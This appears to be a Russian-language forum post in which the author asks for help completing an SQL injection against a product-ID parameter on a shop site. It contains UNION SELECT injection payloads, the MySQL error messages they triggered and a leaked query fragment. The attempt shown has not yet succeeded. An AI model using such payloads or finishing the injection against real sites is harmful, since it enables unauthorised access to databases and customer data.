Всем здрасти...
Есть скул
При попытке проверить ее таким способом 10-1 (должна вывестить 9 новость)
Выводится 10 новость... Значит наврятли можно чего сделать, при попытке подставить ковычку это лезет:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2,3,4,5,6,7,8--' and pd.products_id = ''+union+select+1,2,3,4,5,6' at line 1

Выплеск запроса(оставил важное токо):where p.products_id = ''+union+select+1,2,3,4,5,6--' and pd.products_id = ''+union+select+1,2,3,4,5,6--' and pd.language_id = '2'

(1,2,3,4... мое, пробывал подобрать)(запрос был таким, id='+union+select+1,2,3,4,5,6--)

При заменне плюсеков на пробелы вылазиет след. ошибка:

1109 - Unknown table 'pd' in field list

(значит внедрение запроса по идее возможно)

Как тут быть? Скул в локалке. Пробывал разные комменты (--,/*, -- ) но не помогает